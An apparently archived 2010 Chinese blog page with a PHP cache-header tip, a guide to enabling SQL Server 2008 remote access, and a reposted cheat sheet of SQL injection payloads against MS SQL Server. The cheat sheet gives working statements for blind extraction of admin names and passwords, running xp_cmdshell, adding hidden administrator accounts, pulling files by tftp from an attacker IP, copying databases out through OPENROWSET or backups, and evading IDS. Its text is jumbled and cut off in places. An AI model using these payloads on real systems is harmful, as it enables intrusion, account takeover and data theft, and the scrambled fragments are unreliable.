2010 七月 7 | 网络蛀虫小窝

2010年07月7日存档

让PHP支持页面回退支持填写的数据还有两种方法

2010年07月7日，星期三

热度:

在开发过程中，往往因为表单出错而返回页面的时候填写的信息都不见了，为了支持页面回跳，可以通过两种方法实现。
第一，使用Header方法设置消息头Cache-control
header(‘Cache-control: private, must-revalidate’); //支持页面回跳
第二，使用session_cache_limiter方法
//注意要写在session_start方法之前
session_cache_limiter(‘private, must-revalidate’);

PS：Cache-Control消息头域说明
Cache- Control指定请求和响应遵循的缓存机制。在请求消息或响应消息中设置Cache-Control并不会修改另一个消息处理过程中的缓存处理过程。请求时的缓存指令包括no-cache、no-store、max-age、max-stale、min-fresh、only-if-cached，响应消息中的指令包括public、private、no-cache、no-store、no-transform、must-revalidate、 proxy-revalidate、max-age。各个消息中的指令含义如下：
Public指示响应可被任何缓存区缓存。
Private指示对于单个用户的整个或部分响应消息，不能被共享缓存处理。这允许服务器仅仅描述当用户的部分响应消息，此响应消息对于其他用户的请求无效。
no-cache指示请求或响应消息不能缓存
no-store用于防止重要的信息被无意的发布。在请求消息中发送将使得请求和响应消息都不使用缓存。
max-age指示客户机可以接收生存期不大于指定时间（以秒为单位）的响应。
min-fresh指示客户机可以接收响应时间小于当前时间加上指定时间的响应。
max-stale指示客户机可以接收超出超时期间的响应消息。如果指定max-stale消息的值，那么客户机可以接收超出超时期指定值之内的响应消息。

标签：php mysql
发布在 php mysql | 评论关闭浏览18 次

改变SQLServer2008设置开启远程连接（转）

2010年07月7日，星期三

热度:

sql server 2008默认是不允许远程连接的，sa帐户默认禁用的，如果想要在本地用SSMS连接远程服务器上的SQL Server 2008，需要做两个部分的配置：

1，SQL Server Management Studio Express（简写SSMS）

2，SQL Server 配置管理器/SQL Server Configuration Manager（简写SSCM）

有两点要注意：

1，2005的外围应用配置器在2008中换了地方

2，有些设置生效需要重启一下SQL Server

step 1: 打开SSMS，用windows身份连接数据库，登录后，右键选择“属性”

step 2: 左侧选择“安全性”，选中右侧的“SQL Server 和 Windows 身份验证模式”以启用混合登录模式

step 3: 选择“连接”，勾选“允许远程连接此服务器”，然后点“确定”

step 4: 展开“安全性”->“登录名”->“sa”，右键选择“属性”

step 5: 左侧选择“常规”，右侧选择“SQL Server 身份验证”，并设置密码

step 6: 选择“状态”，选中“启用”，点击“确定”

step 7: 右击数据库选择“方面”

step 8: 将“RemoteAccessEnabled”属性设为“True”，点“确定”

step 9: 至此SSMS已设置完毕，先退出，再用sa登录，成功即表示sa帐户已经启用

step 10: 下面开始配置SSCM，选中左侧的“SQL Server服务”，确保右侧的“SQL Server”以及“SQL Server Browser”正在运行

step 11: 以下为英文版本界面。如图：右侧的TCP/IP默认是“Disabled”，双击打开设置面板将其修改为“Enabled”

step 12: 选择“IP Addersses”选项卡，设置端口“1433”

step 13: 如图将”Client Protocols”的”TCP/IP”也修改为“Enabled”

step 14: 配置完成，重新启动SQL Server 2008。

此时应该可以使用了，但是还是要确认一下防火墙。

SQL Server 2005/2008 Express安装以后，默认情况下是禁用远程连接的。如果需要远程访问，需要手动配置。

打开防火墙设置。将SQLServr.exe（C:＼Program Files＼Microsoft SQL Server＼MSSQL10.SQLEXPRESS＼MSSQL＼Binn＼sqlservr.exe）添加到允许的列表中。

http://news.newhua.com/news1/program_database/2010/76/107614413510JFK2FBGEH2A573KD4KH9H4KBJH7G7AJI30HF083GKCB_5.html?lt=common

标签：mysql, 服务器
发布在软件技巧 | 评论关闭浏览54 次

常用的SQL注射语句解析（转）

2010年07月7日，星期三

热度:

aths(path)

values(@test)–

;use ku1;–

;create table cmd (str image);– 建立image类型的表cmd

存在xp_cmdshell的测试过程：

;exec master..xp_cmdshell ‘dir’

;exec master.dbo.sp_addlogin jiaoniang$;– 加SQL帐号

;exec master.dbo.sp_password null,jiaoniang$,1866574;–

;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;–

;exec master.dbo.xp_cmdshell ‘net user jiaoniang$ 1866574 /workstations:*

/times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;–

;exec master.dbo.xp_cmdshell ‘net localgroup administrators jiaoniang$

/add’;–

exec master..xp_servicecontrol ‘start’, ‘schedule’ 启动服务

exec master..xp_servicecontrol ‘start’, ‘server’

; DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC

SP_OAMETHOD @shell,’run’,null, ‘C：\WINNT\system32\cmd.exe /c net user

jiaoniang$ 1866574 /add’

;DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC

SP_OAMETHOD @shell,’run’,null, ‘C：\WINNT\system32\cmd.exe /c net

localgroup administrators jiaoniang$ /add’

‘; exec master..xp_cmdshell ‘tftp -i youip get file.exe’– 利用TFTP上传文件

;declare @a sysname set @a=’xp_’+'cmdshell’ exec @a ‘dir c:\’

;declare @a sysname set @a=’xp’+'_cm’+’dshell’ exec @a ‘dir c:\’

;declare @a;set @a=db_name();backup database @a to

disk=’你的IP你的共享目录bak.dat’

如果被限制则可以。

select * from openrowset(‘sqloledb’,'server’;'sa’;”,’select ”OK!” exec

master.dbo.sp_addlogin hax’)

查询构造：

Select * FROM news Where id=… AND topic=… AND …..

admin’and 1=(select count(*) from [user] where username=’victim’ and

right(left(userpass,01),1)=’1′) and userpass <>’

select 123;–

;use master;–

:a’ or name like ‘fff%’;– 显示有一个叫ffff的用户哈。

and 1<>(select count(email) from [user]);–

;update [users] set email=(select top 1 name from sysobjects where

xtype=’u’ and status>0) where name=’ffff’;–

;update [users] set email=(select top 1 id from sysobjects where xtype=’u’

and name=’ad’) where name=’ffff’;–

‘;update [users] set email=(select top 1 name from sysobjects where

xtype=’u’ and id>581577110) where name=’ffff’;–

‘;update [users] set email=(select top 1 count(id) from password) where

name=’ffff’;–

‘;update [users] set email=(select top 1 pwd from password where id=2)

where name=’ffff’;–

‘;update [users] set email=(select top 1 name from password where id=2)

where name=’ffff’;–

上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into users values( 666,

char(0×63)+char(0×68)+char(0×72)+char(0×69)+char(0×73),

char(0×63)+char(0×68)+char(0×72)+c

SQL注射语句

1.判断有无注入点

‘ ; and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) —判断是否存在admin这张表

3.猜帐号数目如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称。

and 1=(select count(*) from admin where len(*)>0)–

and 1=(select count(*) from admin where len(用户字段名称name)>0)

and 1=(select count(*) from admin where len(密码字段名称password)>0)

5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止

and 1=(select count(*) from admin where len(*)>0)

and 1=(select count(*) from admin where len(name)>6) 错误

and 1=(select count(*) from admin where len(name)>5) 正确长度是6

and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确

and 1=(select count(*) from admin where len(password)>12) 错误长度是12

and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符

and 1=(select count(*) from admin where left(name,1)=’a') —猜解用户帐号的第一位

and 1=(select count(*) from admin where left(name,2)=’ab’)—猜解用户帐号的第二位

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) –

这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

看服务器打的补丁=出错了打了SP4补丁

and 1=(select @@VERSION)–

看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。

and 1=(Select IS_SRVROLEMEMBER(‘sysadmin’))–

判断连接数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）

and ‘sa’=(Select System_user)–

and user_name()=’dbo’–

and 0<>(select user_name()–

看xp_cmdshell是否删除

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND

name = ‘xp_cmdshell’)–

xp_cmdshell被删除，恢复,支持绝对路径的恢复

;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’,'xplog70.dll’–

;EXEC master.dbo.sp_addextendedproc

‘xp_cmdshell’,'c:\inetpub\wwwroot\xplog70.dll’–

反向PING自己实验

;use master;declare @s int;exec sp_oacreate “wscript.shell”,@s out;exec

sp_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–

加帐号

;DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC

SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net user

jiaoniang$ 1866574 /add’–

创建一个虚拟目录E盘：

;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod

@o, ‘run’, NULL,’ cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -

w “默认Web站点”

-v “e”,”e：\”‘–

访问属性：（配合写入一个webshell）

declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod

@o, ‘run’, NULL,’ cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a

w3svc/1/ROOT/e +browse’

爆库特殊技巧：:%5c=’\’ 或者把/和\ 修改%5提交

如何得到SQLSERVER某个数据库中所有表的表名？

——————————————————————————–

用户表：

select name from sysobjects where xtype = ‘U’;

系统表：

select name from sysobjects where xtype = ‘S’;

所有表：

select name from sysobjects where xtype = ‘S’ or xtype = ‘U’;

——————————————————————————–

and 0<>(select top 1 paths from newtable)–

得到库名（从1到5都是系统的id，6以上才可以判断）

and 1=(select name from master.dbo.sysdatabases where dbid=7)–

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and

dbid=6)

依次提交 dbid = 7,8,9…. 得到更多的数据库名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U') 暴到一个表

假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name

not in (‘Admin’)) 来得到其他的表。

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and

name=’admin’

and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)

得到一个admin的一个字段,假设为 user_id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and

name not in

(‘id’,…)) 来暴出其他的字段

and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名

依次可以得到密码。。。。。假设存在user_id username ,password 等字段

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and

dbid=6)

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U') 得到表名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name

not in(‘Address’))

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and

name=’admin’ and uid>(str(id))) 判断id值

and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

(union，access也好用)

得到WEB路径

;create table [dbo].[swap] ([swappass][char](255));–

and (select top 1 swappass from swap)=1–

;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare

@test varchar(20) exec master..xp_regread @rootkey=’HKEY_LOCAL_MACHINE’,

@key=’SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\’,

@value_name=’/', values=@test OUTPUT insert into p

har(0×69)+char(0×73), 0xffff)–

insert into users values( 667,123,123,0xffff)–

insert into users values ( 123, ‘admin”–’, ‘password’, 0xffff)–

;and user>0

;and (select count(*) from sysobjects)>0

;and (select count(*) from mysysobjects)>0 //为access数据库

枚举出数据表名

;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and

status>0);–

这是将第一个表名更新到aaa的字段处。

读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>’刚才得到的表名’）。

;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and

status>0 and name<>’vote’);–

然后id=1552 and exists(select * from aaa where aaa>5)

读出第二个表，一个个的读出，直到没有为止。

读字段是这样：

;update aaa set aaa=(select top 1 col_name(object_id(‘表名’),1));–

然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名

;update aaa set aaa=(select top 1 col_name(object_id(‘表名’),2));–

然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]

update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and

status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件] select top 1 name from

sysobjects where xtype=u and status>0 and name not in(‘table1′,’table2′,…)

通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]

update 表名 set 字段=(select top 1 col_name(object_id(‘要查询的数据表名’),字段列如:1) [

where 条件]

绕过IDS的检测[使用变量]

;declare @a sysname set @a=’xp_’+'cmdshell’ exec @a ‘dir c:\’

;declare @a sysname set @a=’xp’+'_cm’+’dshell’ exec @a ‘dir c:\’

1、开启远程数据库

基本语法

select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=123′,

‘select * from table1′ )

参数: (1) OLEDB Provider name

2、其中连接字符串参数可以是任何端口用来连接,比如

select * from OPENROWSET(‘SQLOLEDB’,

‘uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;’, ‘select *

from table’

3.复制目标主机的整个数据库insert所有远程表到本地表。

基本语法：

insert into OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=123′,

‘select * from table1′) select * from table2

这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：

insert into